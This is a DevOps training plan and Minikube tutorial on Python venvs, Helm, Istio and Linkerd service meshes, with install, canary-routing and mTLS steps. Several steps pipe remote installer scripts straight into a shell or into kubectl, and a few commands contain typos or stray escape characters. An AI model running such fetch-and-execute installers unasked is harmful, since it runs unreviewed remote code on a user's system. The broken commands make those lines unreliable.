- .venv: This is the name of the directory where the virtual environment will be created. The dot (.) at the beginning makes it a hidden directory on Unix-like systems, which is a common convention to keep your project directory tidy.
Activating a virtual environment:On Unix or MacOS:
source .venv/bin/activate
On Windows: .venv\\Scripts\\activate
Installing packages in a virtual environment:
Once activated, you can use pip to install packages, and they will be isolated to this environment.
pip install requests
Deactivating a virtual environment:
deactivate
Creating a requirements file:
To share your project's dependencies, you can create a requirements.txt file:
pip freeze > requirements.txt
Installing from a requirements file:
pip install -r requirements.txt
Remember, it's a good practice to use virtual environments for each of your Python projects to avoid conflicts between package versions. Explore pyenv
Kubernetes Python client library
- Installation:
pip install kubernetes
This will allow Authentication and configuration, Creating, reading, updating, and deleting Kubernetes resources
Simple Python scripts for Kubernetes interaction
Here is an example to;
- Listing pods in a namespace
- Creating and managing deployments
- Watching for changes in resources
Example script to list pods:
Create a virtual env
python3 -m venv .venvsource .venv/bin/activatepip install kubernetes- Create
testscript.py
from kubernetes import client, config
config.load_kube_config()
v1 = client.CoreV1Api()
pods = v1.list_pod_for_all_namespaces(watch=False)
for pod in pods.items:
print(f"{pod.metadata.namespace}\t{pod.metadata.name}")
python3 testscript.py\
If running minikube the output may look like this
default debug-env
default webapp-6988595754-qnkqp
default webapp-6d989cd746-8wgzs
default webapp-cf544bc7c-24zpb
kube-system coredns-7db6d8ff4d-t46mv
kube-system etcd-minikube
kube-system kube-apiserver-minikube
kube-system kube-controller-manager-minikube
kube-system kube-proxy-jkgd5
kube-system kube-scheduler-minikube
kube-system storage-provisioner
You now have the basics to interact with a kubernetes cluster via python.
Link: https://github.com/kubernetes-client/python
Day 5: Helm Basics
Helm's Purpose and Architecture
Helm is a package manager for Kubernetes that simplifies the deployment and management of applications. It allows you to define, install, and upgrade even the most complex Kubernetes applications.
https://youtu.be/-Bq2BVdzydc < a good tutorial
Key Components:
- Helm Client: The command-line tool used to create, package, and manage charts.
- Charts: Packages of pre-configured Kubernetes resources.
- Releases: Instances of a chart running in a Kubernetes cluster.
Creating and Structure of a Helm Chart
Let's create a chart and examine its structure:
You will have needed to install helm
helm create mychart cd mychart
The chart structure:
mychart/
Chart.yaml # Metadata about the chart
values.yaml # Default configuration values
charts/ # Directory for chart dependencies
templates/ # Directory for template files
deployment.yaml
service.yaml
ingress.yaml
_helpers.tpl # Template helpers
.helmignore # Patterns to ignore when packaging
Chart.yaml Example:
apiVersion: v2
name: mychart
description: A Helm chart for Kubernetes
type: application
version: 0.1.0
appVersion: "1.16.0"
values.yaml Example:
replicaCount: 1
image:
repository: nginx
pullPolicy: IfNotPresent
tag: ""
service:
type: ClusterIP
port: 80
ingress:
enabled: false
Deploying Applications with Helm
To install a chart:
helm install myrelease ./mychart
To customize values during installation:
helm install myrelease ./mychart \--set service.type=LoadBalancer
Or using a custom values file:
helm install myrelease ./mychart -f custom-values.yaml
Advanced Helm Concepts
Hooks
Hooks allow you to intervene at certain points in a release's lifecycle. Here's an example of a pre-install hook:
apiVersion: batch/v1
kind: Job
metadata:
name: {{ .Release.Name }}-pre-install-job
annotations:
"helm.sh/hook": pre-install
spec:
template:
spec:
containers:
- name: pre-install-job
image: busybox
command: ['sh', '-c', 'echo Pre-install job running']
restartPolicy: Never
Dependencies
You can define dependencies in theChart.yamlfile:
dependencies:
- name: apache
version: 1.2.3
repository: https://charts.bitnami.com/bitnami
Then, update dependencies:
helm dependency update
Templating
Helm uses Go templates. Here's an example of a template using conditionals and loops:
apiVersion: apps/v1
kind: Deployment
metadata:
name: {{ .Release.Name }}-deployment
spec:
replicas: {{ .Values.replicaCount }}
selector:
matchLabels:
app: {{ .Chart.Name }}
template:
metadata:
labels:
app: {{ .Chart.Name }}
spec:
containers:
- name: {{ .Chart.Name }}
image: "{{ .Values.image.repository }}:{{ .Values.image.tag }}"
ports:
- containerPort: 80
{{- if .Values.env }}
env:
{{- range $key, \$value := .Values.env }}
- name: {{ $key }}
value: {{ $value | quote }}
{{- end }}
{{- end }}
Creating Helm Charts with Python Templates
While Helm natively uses Go templates, you can use Python to generate Helm charts dynamically.
Using Jinja2 for Templating
Here's an example of using Jinja2 to generate a Kubernetes manifest:
from jinja2 import Template
template = Template("""
apiVersion: apps/v1
kind: Deployment
metadata:
name: {{ name }}-deployment
spec:
replicas: {{ replicas }}
selector:
matchLabels:
app: {{ name }}
template:
metadata:
labels:
app: {{ name }}
spec:
containers:
- name: {{ name }}
image: {{ image }}
ports:
- containerPort: {{ port }}
""")
rendered = template.render(
name=\"myapp\",
replicas=3,
image=\"nginx:latest\",
port=80
)
print(rendered)
Generating Kubernetes Manifests Dynamically
You can use Python to read configuration from various sources and generate Helm charts:
import yaml
from jinja2 import Template
def generate_chart(config):
# Load templates
deployment_template = Template(open('templates/deployment.yaml').read())
service_template = Template(open('templates/service.yaml').read())
# Render templates
deployment = deployment_template.render(config)
service = service_template.render(config)
# Combine rendered templates
chart = f"{deployment}\n---\n{service}"
return chart
# Read configuration
with open('app_config.yaml', 'r') as f:
config = yaml.safe_load(f)
# Generate chart
chart = generate_chart(config)
# Write chart to file
with open('generated_chart.yaml', 'w') as f:
f.write(chart)
Integrating with CI/CD Pipelines
You can incorporate this Python-based chart generation into your CI/CD pipeline:
# Example GitLab CI job
generate_helm_chart:
stage: build
script:
- pip install pyyaml jinja2
- python generate_chart.py
artifacts:
paths:
- generated_chart.yaml
This job would generate the Helm chart as part of your CI/CD process, allowing for dynamic chart creation based on your application's needs.These examples demonstrate how to create more complex Helm charts, use advanced features, and even integrate Python for dynamic chart generation.
Week 3: Istio Deep Dive
Day 1: Istio Basics
Installing Istio on your Kubernetes cluster
Download Istio
https://istio.io/latest/docs/setup/getting-started/#download
Mac can use brew brew install istionctl
Install Istio
istio provides a demo for testing and learning:
- It installs more components than the default profile, including:
- Istiod (the Istio control plane)
- Ingress gateway
- Egress gateway
- It enables a set of features that are suitable for demonstrating Istio's capabilities.
- It has higher resource requirements than the minimal or default profiles.
- It's not recommended for production use due to its expanded feature set and resource usage.
istioctl install --set profile=demo -y
Enable automatic sidecar injection
kubectl label namespace default istio-injection=enabled
Istio's architecture and core components
Control Plane
istiod: Combines Pilot, Citadel, and Galley into a single binary
Pilot
Pilot is a crucial module within Istiod that focuses on service discovery and traffic management. It is responsible for:
- Service Discovery: Registers services and manages their information, such as versions, IP addresses, and ports.
- Traffic Management: Directs traffic to different service versions or instances based on defined rules.
- Routing and Load Balancing: Routes traffic according to rules and balances load across services.
Pilot interacts with the data plane by configuring service proxies (like Envoy) to manage ingress and egress traffic effectively.
Citadel
Citadel is another component integrated into Istiod, primarily handling security aspects. It manages:
- Certificate Management: Provides certificate-based authentication and authorization.
- Security Policies: Enforces security policies based on service identity.
Galley
Galley was responsible for configuration management in Istio. It handled:
- Configuration Verification and Distribution: Ensured the validity of configuration rules and distributed them to other Istio components.
- Configuration Storage: Maintained properties and configuration information for Istio components.
Data Plane
Envoy proxy: Sidecar container deployed alongside each service
Addons
- Prometheus: An open-source system for metrics collection and monitoring, storing data as time series with flexible querying capabilities.
- Grafana: A platform for metrics visualization, providing a variety of visual representations to analyse time-series data from sources like Prometheus.
- Jaeger or Zipkin: Tools for distributed tracing that help monitor and troubleshoot microservices by collecting and analysing trace data.
- Kiali: A service mesh observability tool that visualizes the structure and health of an Istio service mesh, aiding in monitoring and troubleshooting.
Day 2: Istio Traffic Management
Exploring Istio's traffic management features
Virtual Services: Define routing rules for traffic
apiVersion: networking.istio.io/v1alpha3
kind: VirtualService
metadata:
name: reviews-route
spec:
hosts:
- reviews
http:
- route:
- destination:
host: reviews
subset: v1
weight: 75
- destination:
host: reviews
subset: v2
weight: 25
This configuration defines a VirtualService for managing HTTP traffic routing to different versions (subsets) of the reviews service. It splits traffic between two subsets, v1 and v2, with 75% going to v1 and 25% going to v2.
Destination Rules: Define policies that apply after routing
apiVersion: networking.istio.io/v1alpha3
kind: DestinationRule
metadata:
name: reviews-destination
spec:
host: reviews
subsets:
- name: v1
labels:
version: v1
- name: v2
labels:
version: v2
This configuration defines a DestinationRule for the reviews service, specifying two subsets, v1 and v2. Each subset is identified by labels that correspond to versions of the service. These subsets are referenced in the Istio configuration of the VirtualService, to route traffic to specific versions of a service. This is useful for scenarios like canary deployments or A/B testing.
Gateways: Manage inbound and outbound traffic for the mesh
Implementing canary deployments and A/B testing
- Use VirtualService (as above) to split traffic between versions
- Gradually adjust weights to increase traffic to new version
- Monitor metrics to ensure new version performs as expected
Istio's load balancing and circuit breaking capabilities
Load Balancing: Configure in DestinationRule
spec:
trafficPolicy:
loadBalancer:
simple: ROUND_ROBIN
Circuit Breaking: Define in DestinationRule
spec:
trafficPolicy:
outlierDetection:
consecutiveErrors: 5
interval: 5s
baseEjectionTime: 30s
Day 3: Istio Security and Observability
Istio's security features
mTLS (Mutual TLS)
- Enable cluster-wide:
kubectl apply -f istio-1.x.x/samples/security/strict-mtls.yaml - Verify: istioctl x authz check <pod-name>
Authorization Policies
apiVersion: security.istio.io/v1beta1
kind: AuthorizationPolicy
metadata:
name: allow-read
spec:
action: ALLOW
rules:
- to:
- operation:
methods: ["GET"]
Exploring Istio's observability stack
Prometheus
- Access dashboard: istioctl dashboard prometheus
- Query metrics using PromQL
Grafana
- Access dashboard: istioctl dashboard grafana
- Explore pre-configured Istio dashboards
Kiali
- Access dashboard: istioctl dashboard kiali
- Visualize service mesh topology and health
Jaeger/Zipkin
- Access Jaeger UI: istioctl dashboard jaeger
- Analyze distributed traces
Day 4-5: Deploying a Sample Application with Istio
Objective
Deploy a simple web application with Istio sidecar injection and implement basic traffic routing.
Prerequisites
- Kubernetes cluster set up
- Istio installed with demo profile
- kubectl and istioctl configured
Enable Istio Sidecar Injection
First, let's enable Istio sidecar injection for the default namespace:
kubectl label namespace default istio-injection=enabled
(This can be verified with kubectl get namespace default --show-labels)
The command is used to enable automatic Istio sidecar injection for the default namespace in a Kubernetes cluster.
Key points about this command:
- Namespace-level control: By labeling a namespace, you're enabling Istio sidecar injection for all pods created in that namespace, unless overridden at the pod level.
- Automatic injection: When a namespace has this label, the Istio sidecar (Envoy proxy) will be automatically injected into all new pods deployed in that namespace.
- Existing workloads: This label only affects new pods. Existing workloads will need to be redeployed to get the sidecar injected.
- Override option: Even with this namespace-level setting, individual pods can opt out of injection using the sidecar.istio.io/inject: “false” annotation.
- Verification: After applying this label, you can verify it worked by deploying a new pod in the namespace and checking for the presence of the istio-proxy container.
- Reversibility: You can disable injection for the namespace by changing the label value to disabled or removing the label entirely.
Deploy a Sample Application
Create a file named sample-app.yaml with the following content:
apiVersion: apps/v1
kind: Deployment
metadata:
name: myapp
spec:
replicas: 2
selector:
matchLabels:
app: myapp
template:
metadata:
labels:
app: myapp
version: v1
spec:
containers:
- name: myapp
image: nginx:1.14.2
ports:
- containerPort: 80
---
apiVersion: v1
kind: Service
metadata:
name: myapp
spec:
selector:
app: myapp
ports:
- port: 80
targetPort: 80
or to apply in one
cat <<EOF | kubectl -f -
yaml
EOF
Deploy the application:
kubectl apply -f sample-app.yaml
Verify the deployment:
kubectl get pods
You should see two containers per pod (app + istio-proxy), indicating successful sidecar injection.
eg kubectl describe pod/\<pod name\>
You will see something like
Events:
Type Reason Age From Message
---- ------ ---- ---- -------
Normal Scheduled 5m default-scheduler Successfully assigned default/myapp-7d4cbc4c78-mhdmd to minikube
Normal Pulled 5m kubelet Container image
"docker.io/istio/proxyv2:1.23.2" already present on machine
Normal Created 5m kubelet Created container istio-init
Normal Started 5m kubelet Started container istio-init
Normal Pulling 5m kubelet Pulling image "nginx:1.14.2"
Normal Pulled 4m54s kubelet Successfully pulled image "nginx:1.14.2"
in 885ms (5.074s including waiting). Image size: 102757429 bytes.
Normal Created 4m54s kubelet Created container myapp
Normal Started 4m54s kubelet Started container myapp
Normal Pulled 4m54s kubelet Container image
"docker.io/istio/proxyv2:1.23.2" already present on machine
Normal Created 4m54s kubelet Created container istio-proxy
Normal Started 4m54s kubelet Started container istio-proxy
Create a Virtual Service
Create a file named virtual-service.yaml:
apiVersion: networking.istio.io/v1alpha3
kind: VirtualService
metadata:
name: myapp-route
spec:
hosts:
- myapp
http:
- route:
- destination:
host: myapp
subset: v1
Apply the Virtual Service:
kubectl apply -f virtual-service.yaml
View with
kubectl get svc
A VirtualService in Istio is a custom resource definition (CRD) that allows you to configure how requests are routed to services within the Istio service mesh. It acts as a flexible and powerful tool for traffic management, enabling you to define routing rules that dictate how traffic should be directed to different service versions or destinations based on specified criteria.
Key Features of VirtualService
- Traffic Routing.
- Decoupling Requests and Destinations.
- Advanced Traffic Management.
- Integration with Other Istio Resources.
- Internal and External Traffic Control.
Create a Destination Rule
Create a file named destination-rule.yaml:
apiVersion: networking.istio.io/v1alpha3
kind: DestinationRule
metadata:
name: myapp-destination
spec:
host: myapp
subsets:
- name: v1
labels:
version: v1
Apply the Destination Rule:
kubectl apply -f destination-rule.yaml
verify with
k get destinationrules
Test the Routing
To test the routing, we'll need to access the application. For simplicity, let's use port-forwarding:
kubectl port-forward service/myapp 8080:80
Now, in another terminal, you can access the application:
curl http://localhost:8080
You should see the nginx welcome page.
Implement Canary Deployment
Let's update our application to version 2. Create a file named sample-app-v2.yaml:
apiVersion: apps/v1
kind: Deployment
metadata:
name: myapp-v2
spec:
replicas: 1
selector:
matchLabels:
app: myapp
version: v2
template:
metadata:
labels:
app: myapp
version: v2
spec:
containers:
- name: myapp
image: nginx:1.16.0
ports:
- containerPort: 80
Deploy version 2:
kubectl apply -f sample-app-v2.yaml
Update the virtual-service.yaml to split traffic:
apiVersion: networking.istio.io/v1alpha3
kind: VirtualService
metadata:
name: myapp-route
spec:
hosts:
- myapp
http:
- route:
- destination:
host: myapp
subset: v1
weight: 75
- destination:
host: myapp
subset: v2
weight: 25
Update the destination-rule.yaml:
apiVersion: networking.istio.io/v1alpha3
kind: DestinationRule
metadata:
name: myapp-destination
spec:
host: myapp
subsets:
- name: v1
labels:
version: v1
- name: v2
labels:
version: v2
Apply the updated configurations:
kubectl apply -f virtual-service.yaml
kubectl apply -f destination-rule.yaml
Now, when you access the application, 75% of the traffic will go to v1 and 25% to v2.
Testing can be run as for i in {1..200}; do echo \$(curl -s http://localhost:8080 \| grep \"version\"); sleep .5; done\
observability
Apply Prometheus kubectl apply -f https://raw.githubusercontent.com/istio/istio/release-1.23/samples/addons/prometheus.yaml
Apply kiali kubectl apply -f https://raw.githubusercontent.com/istio/istio/release-1.23/samples/addons/kiali.yaml
Access dashboard istioctl dashboard kiali
Conclusion
In this lesson, we've deployed a sample application with Istio, implemented basic traffic routing, and set up a canary deployment. This demonstrates some of Istio's core traffic management capabilities. In a real-world scenario, you would monitor the performance of both versions and gradually adjust the traffic split until you're confident in the new version's performance.Remember to clean up your resources after the lesson:
kubectl delete -f sample-app.yaml
kubectl delete -f sample-app-v2.yaml
kubectl delete -f virtual-service.yaml
kubectl delete -f destination-rule.yaml
This lesson provides a practical introduction to Istio's traffic management features. For more advanced scenarios, you could explore features like fault injection, circuit breaking, and more complex routing rules.
If using minikube a simple minikube delete will remove all existance of the cluster
Week 4: Linkerd and Practical Applications
Day 1: Linkerd Basics
Installing Linkerd on your Kubernetes cluster
Install CLI
https://linkerd.io/2.16/tasks/install/
Again Mac can use brew
curl --proto \'=https\' --tlsv1.2 -sSfL https://run.linkerd.io/install | sh
export PATH=\$PATH:\$HOME/.linkerd2/bin
linkerd version
Alternatively, you can download the binary directly from the Linkerd releases page.
Install Linkerd on Your Minikube Cluster
linkerd install \--crds \| kubectl apply -f -
linkerd install \--set proxyInit.runAsRoot=true \| kubectl apply -f -
Validate cluster
linkerd check --pre
Install Linkerd
linkerd install \| kubectl apply -f -
Install viz
linkerd viz install \| kubectl apply -f -
linkerd viz check
linkerd viz dashboard
Linkerd's architecture and core components
Control Plane
- controller: Manages and configures proxy instances
- destination: Service discovery and load balancing
- identity: Certificate management for mTLS
Data Plane
linkerd-proxy: Ultra-lightweight proxy (written in Rust)
Add-ons
- Grafana: Metrics visualization
- Prometheus: Metrics collection
Linkerd Features
Traffic management capabilities
Traffic Split:
apiVersion: split.smi-spec.io/v1alpha1
kind: TrafficSplit
metadata:
name: web-split
spec:
service: web-svc
backends:
- service: web-v1
weight: 500m
- service: web-v2
weight: 500m
Retries and Timeouts: Configured via annotations
Linkerd's observability and security features
- Automatic mTLS:
Enabled by default for all meshed servicesb. - Metrics:
Access via CLI or Grafana dashboards
linkerd viz stat deployment
- Live Traffic View:
linkerd viz top
- Traffic Inspection:
linkerd tap deployment/your-deployment
Day 2-4: Hands-on Exercise
Deploying and Managing emojivoto with Linkerd
Sheet here Linkerd in a Minikube Env
Deploy the emojivoto sample application
curl -sL https://run.linkerd.io/emojivoto.yml \| kubectl apply -f -
This command downloads the emojivoto application manifest and applies it to your Kubernetes cluster. Verify the deployment:
kubectl get pods -n emojivoto
Inject Linkerd into the application
kubectl get -n emojivoto deploy -o yaml \| linkerd inject - \| kubectl apply -f -
This command retrieves all deployments in the emojivoto namespace, injects the Linkerd sidecar, and reapplies the configuration. Verify the injection:
kubectl get pods -n emojivoto
You should now see two containers per pod (the application container and the Linkerd proxy).
Observe traffic
Install smi
helm repo add linkerd-smi https://linkerd.github.io/linkerd-smi
helm install smi linkerd-smi/linkerd-smi
The Service Mesh Interface (SMI) is a standard specification for service meshes on Kubernetes, providing a set of common APIs to enable interoperability between different service mesh implementations, allowing users to manage microservices communication without being tied to a specific provider.
linkerd viz stat -n emojivoto deploy
This command shows real-time metrics for your deployments, including success rate, requests per second, and latency.
Visualize the service mesh
linkerd viz dashboard
This opens the Linkerd dashboard in your default browser. Explore the various sections to see detailed metrics, topology, and live calls.
In a terminal create port fowarding kubectl -n emojivoto port-forward svc/web-svc 8080:80
Create traffic for i in {1..20000}; do curl -s http://localhost:8080 ; done
Implement a traffic split for canary deployment
First, let's create a new version of the voting service:
cat \<\<EOF \| kubectl apply -f -
apiVersion: apps/v1
kind: Deployment
metadata:
name: voting-v2
namespace: emojivoto
spec:
replicas: 1
selector:
matchLabels:
app: voting-svc
version: v2
template:
metadata:
labels:
app: voting-svc
version: v2
spec:
containers:
- name: voting-svc
image: buoyantio/emojivoto-voting-svc:v11
env:
- name: GRPC_PORT
value: "8080"
ports:
- containerPort: 8080
EOF
or
(kubectl get deployments web -n emojivoto -o yaml > web-deployment.yaml ; sed -i 's/name: web/name: web-v2/' web-deployment.yaml sed -i 's/image: emojivoto-web:v1/image: emojivoto-web:v2/' web-deployment.yaml ; kubectl apply -f web-deployment.yaml ;rm web-deployment.yaml)
Now, create a TrafficSplit to gradually shift traffic:
cat <<EOF | kubectl apply -f -
apiVersion: split.smi-spec.io/v1alpha2
kind: TrafficSplit
metadata:
name: voting-split
namespace: emojivoto
spec:
service: voting-svc
backends:
- service: voting
weight: 900
- service: voting-v2
weight: 100
EOF
This configuration sends 90% of traffic to the original version and 10% to the new version.
run kubectl get -n emojivoto deploy -o yaml | linkerd inject - | kubectl apply -f -
Observe the traffic split
linkerd viz stat -n emojivoto deploy voting voting-v2
You should see traffic being split between the two versions according to the weights specified in the TrafficSplit resource.
Gradually increase traffic to the new version
As you gain confidence in the new version, you can update the TrafficSplit to increase traffic to v2:
cat <<EOF | kubectl apply -f -
apiVersion: split.smi-spec.io/v1alpha2
kind: TrafficSplit
metadata:
name: voting-split
namespace: emojivoto
spec:
service: voting-svc
backends:
- service: voting
weight: 500m
- service: voting-v2
weight: 500m
EOF
This updates the split to 50/50 between the two versions.
Monitor the canary deployment
Use the Linkerd dashboard or CLI to monitor the performance of both versions:
linkerd -n emojivoto stat deploy voting voting-v2
Keep an eye on success rates, latency, and request volumes to ensure the new version is performing as expected.
(In dashboard services → voting-svc will show the split and successes)
Conclusion
In this hands-on exercise, you've:
- Deployed the emojivoto sample application
- Injected Linkerd into the application
- Observed traffic using Linkerd's CLI and dashboard
- Implemented a canary deployment using TrafficSplit
- Monitored the performance of both versions during the canary rollout
This exercise demonstrates Linkerd's key features for traffic management and observability, providing a practical introduction to service mesh concepts and canary deployments.
Day 5: Service Mesh Comparison
Comparing Istio, Linkerd, and other service mesh solutions
Istio
- Pros: Feature-rich, powerful traffic management
- Cons: Complex, resource-intensive
Linkerd
- Pros: Lightweight, simple, fast
- Cons: Fewer advanced features
Consul Connect
- Pros: Integrates well with HashiCorp ecosystem
- Cons: Less mature as a full service mesh
NGINX Service Mesh
- Pros: Builds on familiar NGINX technology
- Cons: Relatively new, smaller community
When to choose one service mesh over another
- Choose Istio for complex, feature-rich requirements
- Choose Linkerd for simplicity and performance
- Consider Consul Connect if already using HashiCorp tools
- NGINX Service Mesh if familiar with NGINX and need basic mesh features
Week 5: Practical Project
Designing and implementing a microservices application
- Create 3-4 simple microservices (e.g., frontend, backend, database)
- Containerize each service with Docker
- Create Kubernetes manifests for each service
Deploying the application using Helm
- Create a Helm chart for the entire application
- Use subchart for each microservice
- Define configurable values in values.yaml
Implementing service mesh features
- Choose either Istio or Linkerd based on your preference
- Implement traffic routing between service versions
- Set up mTLS between services
- Configure observability (metrics, tracing)
Creating Python scripts for automation
- Script to deploy/update the Helm release
- Script to check service health and metrics
- Script to perform canary deployments
This comprehensive deep dive covers the entire 4-week training plan, providing a solid foundation in Kubernetes, service mesh technologies, and related tools. Remember to practice hands-on with each concept and refer to official documentation for the most up-to-date information.
Additional Resources and Best Practices
- Throughout the training, refer to official documentation for each technology
- Join community forums or discussion groups for each technology
- Consider working on a personal project that incorporates all these technologies
- Explore real-world use cases and examples
- Practice hands-on exercises daily
Tips for Successful Service Mesh Adoption
- Start your service mesh journey early to allow your knowledge to grow organically as your microservices landscape evolves.
- Avoid common design and implementation pitfalls by thoroughly understanding each technology.
- Leverage your service mesh as the mission control of your multi-cloud microservices landscape.
- Consider starting with a sample project to evaluate which service mesh solution you prefer before standardizing across all services.
- Use service mesh as a ‘bridge’ while decomposing monolithic applications into microservices.
- Implement service mesh incrementally, starting with the components you need most.
By following this training plan, you'll gain a solid foundation in service mesh concepts, Kubernetes, Helm, and Python, with practical experience in both Istio and Linkerd. Remember to adapt the pace and depth of each topic based on your prior knowledge and learning speed.
Tools
k9s : https://enix.io/en/blog/k9s/
jq : https://jqlang.github.io/jq/
kubectl : https://kubernetes.io/docs/tasks/tools/
docker: https://docs.docker.com/engine/install/
![]()
Minikube Linkerd
A working service-mesh tutorial — install, observe, secure, route
This is the worked tutorial I wish I’d had when I first stood up a service mesh on a laptop — install Linkerd into Minikube, deploy a sample app, see the mesh in action (mTLS, observability, traffic split, authorization), then tear it down. Pairs with my 5-Week DevOps Training Plan; also useful prep for Helm, Docker, and Kubernetes: A Tiny Training App to Break (and Fix).
Contents
- Prerequisites
- Set up Minikube
- Deploy a sample app
- Install Linkerd
- Inject the proxies
- Explore the mesh
- Dashboard and observability
- mTLS verification
- Traffic management with HTTPRoute
- Authorization policies (mTLS-enforced access)
- Tap and Top
- Cleaning up
- Troubleshooting
- Where to go next
Prerequisites
- Minikube. Install. 4 GB RAM allocated to the VM is comfortable; 2 GB will work but be sluggish.
- kubectl. Configured to talk to your Minikube cluster.
- Linkerd CLI. We’ll install this in a moment.
- A few minutes of patience. Container pulls take longer than the docs imply.
You don’t need to know Linkerd’s internals to follow this — the proxy is a sidecar that intercepts traffic for each pod, and the control plane manages identity, configuration, and metrics. That’s the mental model.
Set up Minikube
Start the cluster with enough resources to be useful:
minikube start --cpus=4 --memory=4096 --kubernetes-version=v1.30.0
minikube status
kubectl get nodes
Confirm kubectl get nodes shows a Ready node before moving on.
Deploy a Sample Application: emojivoto
Linkerd ships a small demo app called emojivoto — a couple of Go services with a Vue frontend, deliberately a bit broken (the doughnut vote always fails, on purpose, so you can see the mesh catch errors).
curl --proto '=https' --tlsv1.2 -sSfL https://run.linkerd.io/emojivoto.yml | \
kubectl apply -f -
kubectl get pods -n emojivoto
Wait until all pods are Running. Then port-forward the web service so you can hit it from a browser:
kubectl -n emojivoto port-forward svc/web-svc 8080:80
Open http://localhost:8080. You should see the emoji voting page. Click an emoji or two — you’re now generating traffic that the mesh will see once we install it.
Leave the port-forward running in another terminal.
Install Linkerd
Install the CLI
Pin a version. Linkerd’s stable channel as of writing is 2.16+; check linkerd.io/2/install for current.
curl --proto '=https' --tlsv1.2 -sSfL https://run.linkerd.io/install | sh
export PATH=$PATH:$HOME/.linkerd2/bin
# stash this in your shell rc so it survives a new shell
echo 'export PATH=$PATH:$HOME/.linkerd2/bin' >> ~/.zshrc
linkerd version
Pre-flight Check
Linkerd is paranoid about installing into a cluster it doesn’t trust. Run the pre-flight before you commit:
linkerd check --pre
Every check should be green. If anything’s red, fix it before continuing — installing on top of a half-working cluster is a recipe for confusing failures later.
Install the Control Plane
Two-step install — CRDs first, then the control plane:
linkerd install --crds | kubectl apply -f -
linkerd install | kubectl apply -f -
# verify
linkerd check
The full check is the moment of truth — every section green means the mesh is ready.
Inject the Proxies
Linkerd doesn’t apply itself automatically; you tell it which workloads should be meshed. The simplest way is to grab the existing deployments, pipe them through linkerd inject, and re-apply:
kubectl get -n emojivoto deploy -o yaml | \
linkerd inject - | \
kubectl apply -f -
# pods will roll over with sidecars attached
kubectl get pods -n emojivoto
Each pod should now show 2/2 containers running (your app + the linkerd-proxy sidecar). That 2/2 is the visual confirmation the mesh is on.
For production, you’d typically annotate the namespace so any deployment in it gets injected automatically:
kubectl annotate namespace emojivoto linkerd.io/inject=enabled
Explore the Mesh
Dashboard and Observability
Linkerd Viz is a separate extension for the dashboard, Prometheus, Grafana, and Jaeger.
linkerd viz install | kubectl apply -f -
linkerd viz check
linkerd viz dashboard &
The dashboard opens in your browser. Click into the emojivoto namespace and you’ll see live metrics — request rate, success rate, p50/p95/p99 latency, retries, and TCP-level stats — for every service. The vote-doughnut endpoint is going to look red because that’s the deliberately-broken bit.
Linkerd’s metrics live in Prometheus and are available via linkerd viz:
# RPS by service
linkerd viz stat deploy -n emojivoto
# detailed view of one service
linkerd viz stat deploy/web -n emojivoto --window 1m
A useful pattern: get raw Prometheus metrics out of the viz extension and write your own queries / dashboards in your own Grafana:
kubectl port-forward -n linkerd-viz svc/prometheus 9090:9090
# Then in your browser at http://localhost:9090:
# rate(request_total{namespace="emojivoto"}[1m])
# histogram_quantile(0.99, rate(response_latency_ms_bucket{namespace="emojivoto"}[1m]))
mTLS Verification
The killer feature: every meshed pod gets a workload identity, certificates issued and rotated automatically, and traffic between meshed pods is mTLS-encrypted with no app changes. Verify it:
linkerd viz tap deploy/web -n emojivoto
Hit the website, vote a few emojis. The tap output will scroll past, with lines like:
req id=12:0 proxy=in src=10.244.0.60:59620 dst=10.244.0.58:8080 tls=true
rsp id=12:0 proxy=in src=10.244.0.60:59620 dst=10.244.0.58:8080 tls=true :status=200 latency=959µs
tls=true is what you’re looking for. That’s mutual TLS between the source and destination pods — no per-app TLS engineering, no certificate juggling, no surprises.
Traffic Management with HTTPRoute
Linkerd 2.14+ uses the Gateway API (HTTPRoute) for traffic splitting; the older TrafficSplit resource is deprecated.
Imagine you’ve built web-v2 with new colours and want 50% of traffic to hit it. (We won’t actually deploy a v2 here — assume it exists for the demo.)
kubectl apply -f - <<'EOF'
apiVersion: gateway.networking.k8s.io/v1beta1
kind: HTTPRoute
metadata:
name: web-split
namespace: emojivoto
spec:
parentRefs:
- name: web-svc
kind: Service
group: ""
port: 80
rules:
- backendRefs:
- name: web-svc
port: 80
weight: 50
- name: web-v2-svc
port: 80
weight: 50
EOF
You can change the weights any time and the mesh will rebalance traffic without restarting anything. Canaries, blue/green, and progressive delivery patterns build on top of this primitive.
Authorization Policies (mTLS-Enforced Access)
Past 2.12, Linkerd has first-class authorization policies. Combine Server (which port on which workload accepts traffic) with AuthorizationPolicy (who can reach it) to enforce identity-based access between meshed workloads.
Lock down the voting-svc so only the web service can call it:
kubectl apply -f - <<'EOF'
apiVersion: policy.linkerd.io/v1beta1
kind: Server
metadata:
name: voting-grpc
namespace: emojivoto
spec:
podSelector:
matchLabels: { app: voting-svc }
port: 8080
proxyProtocol: gRPC
---
apiVersion: policy.linkerd.io/v1beta1
kind: AuthorizationPolicy
metadata:
name: voting-allow-web
namespace: emojivoto
spec:
targetRef:
group: policy.linkerd.io
kind: Server
name: voting-grpc
requiredAuthenticationRefs:
- kind: ServiceAccount
name: web
namespace: emojivoto
EOF
Any other meshed pod trying to call voting-svc:8080 now gets denied at the proxy. This is real, identity-based service-to-service authorisation — no IP allowlists, no shared secrets. For the broader picture this fits into, see Zero Trust Architecture: A Deep Practical Walkthrough.
Tap and Top
Two CLI tools that pay off when something’s broken at 11pm:
# live request stream — tcpdump for HTTP
linkerd viz tap deploy/web -n emojivoto
# top-N requests by route, like top(1) but for service traffic
linkerd viz top deploy/web -n emojivoto
top is the one I reach for first when something’s slow — it shows the path that’s hot and lets you drill in. Pair with the dashboard for the visual view.
Cleaning Up
Tear it all down in reverse order:
# remove the demo app
curl --proto '=https' --tlsv1.2 -sSfL https://run.linkerd.io/emojivoto.yml | \
kubectl delete -f -
# remove Linkerd Viz
linkerd viz uninstall | kubectl delete -f -
# remove the Linkerd control plane
linkerd uninstall | kubectl delete -f -
# stop Minikube if you're done
minikube stop
# nuke it entirely if you want a clean slate
minikube delete
Troubleshooting
The errors I’ve actually hit during fresh installs:
“No objects passed to apply” during linkerd install — you forgot the CRDs step. Run:
linkerd install --crds | kubectl apply -f -
then re-run the control-plane install.
Pods stuck Init:Error after injection — usually proxyInit running into kernel-permission issues on local clusters. The default is fine on most Minikube setups; if it isn’t, you’ll want to investigate the init container logs:
kubectl logs -n emojivoto <pod> -c linkerd-init
If you see iptables errors, the older workaround was --set proxyInit.runAsRoot=true on install. Modern Linkerd handles this without the flag on most setups.
linkerd check red on identity — usually clock skew between Minikube and your host. Restart Minikube and the host time-sync, run linkerd check again.
